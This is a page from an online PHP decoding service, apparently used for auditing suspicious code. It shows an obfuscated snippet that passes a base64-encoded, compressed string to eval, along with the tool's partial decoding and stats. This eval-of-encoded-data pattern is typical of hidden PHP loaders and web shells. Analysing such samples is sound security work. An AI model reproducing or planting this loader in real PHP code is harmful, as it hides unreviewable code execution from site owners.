Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$stt1 = "Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNz\x434pSi4upI5yUWJxqZhKfkpq\x63n5K..

Decoded Output download

<?  $stt1 = "Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yUWJxqZhKfkpqcn5KqAbSzKLVMQ6W4pMRAEwlYAwA="; 
 
eval(htmlspecialchars_decode(gzinflate(base64_decode($stt1)))); ?>

Did this file decode correctly?

Original Code

$stt1 = "Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNz\x434pSi4upI5yUWJxqZhKfkpq\x63n5Kq\x41\x62SzKLVMQ6W4pMR\x41EwlY\x41w\x41\x3d";

eval(htmlspecialchars_decode(gzinflate(base64_decode($stt1))));

Function Calls

gzinflate 1
base64_decode 1
htmlspecialchars_decode 1

Variables

$stt1 Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yU..

Stats

MD5 b5a92b5e519a09145a748f745996db25
Eval Count 0
Decode Time 128 ms